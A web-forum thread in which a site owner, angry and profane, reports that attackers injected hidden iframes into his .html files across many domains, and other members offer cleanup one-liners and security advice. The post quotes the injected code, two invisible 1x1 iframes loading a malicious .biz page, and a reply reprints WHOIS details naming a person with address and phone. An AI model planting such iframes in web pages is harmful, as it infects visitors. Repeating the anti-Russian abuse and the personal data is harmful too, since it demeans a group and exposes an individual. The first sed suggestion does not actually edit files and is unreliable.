|
fucking russian hackers!
again, for third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i i cannot even imagine what i would do. i am so pissed now!
any how, my hosting provider is lookin on how they got in, any ideas on where i should check? also is there a way to run a shell command to replace a string in all .html files accross a directory structure? i hate to spend next 20 hours going over all my files. any help is appreciated. :mad: |
i am loosing traffic by thousands each fucking minute, damn!
|
show the code being added and maybe we can help you a little more
|
First step is not calling them "fucking" anything.....
It is best to be nice to the Russians, Treat them the same as you would like to be treated.... |
Trie to defend whit Kaspersky
|
those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck
|
if your with a good managed hosting provider, things like this would not happen.
|
What is your host?
|
i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again.
I dont hate every Russian, but why is like 99.9% of todays worlds hackers are Russians, they fucking suck and should die! any how the code they included is as follows: WARNING: access the page on your own rist it loads some applets and shit: Code:
<iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe> |
Domain Name: DGFJHEWFNDSBFSDVF.BIZ
Domain ID: D15515786-BIZ Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Sponsoring Registrar IANA ID: 82 Domain Status: clientTransferProhibited Registrant ID: OLNIC34919537 Registrant Name: Boriskin Gleb Registrant Organization: Boriskin Gleb Registrant Address1: vesekaya 4-155 Registrant City: Novosibirsk Registrant State/Province: Novosibirsk Registrant Postal Code: 109880 Registrant Country: Russian Federation Registrant Country Code: RU Registrant Phone Number: +7.3098098911 Registrant Facsimile Number: +7.3098098911 Name Server: NS3.ASDBIZ.BIZ Name Server: NS4.ASDBIZ.BIZ Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006 Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007 Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006 FUCKING RUSSIAN! |
ok, if all the files are in the same directory you can just run this...
cat * | sed 's/$FIND/$REPLACE/g' change $FIND to what you want to match and $REPLACE with what you want to change it to. |
:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc
|
Quote:
not just that. you have to make each file 'read only' which is an even bigger pain in the ass |
Quote:
trust me, I tried everything and making them read only didn't do shit. |
no shit, you guys never found how they got in? amazing....
|
russians are crazy i kno first hand
|
x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff.
Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole. |
russian hackers lol
|
Don't fuck with russians. Not all the russians are hackers.
|
Quote:
Exactly.. You forgot about drug dealers and simple criminals :winkwink: :1orglaugh As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/ |
Quote:
perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"` It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name. |
Quote:
get a real host dude. |
six figure sys admins are worth thier weight in gold
|
Quote:
|
Quote:
|
Quote:
Yeah ... Now stfu and pay me for this month :smokin :ak47: |
I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.
|
You guys should look into curing SQL injection.
|
Quote:
I like your solution better than mine though.. I need to get more comfortable with perl. |
got hit again. i am loosing it...........
|
x3movies,
Contact me on ICQ, I can more likely than not help. 251095197 -JM |
EDIT: free of charge
|
Ever heard of back-ups?
|
i got hacked too... an Iframe installing a Trojan horse :disgust
|
Get yourself a copy of CentOS and Atomic Secured Linux
[http://atomicorp.com/amember/signup.php] And kiss all these problems goodbye. |
Quote:
|
i had this a while back host said it was something to do with awstats..
|
| All times are GMT -7. The time now is 02:00 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123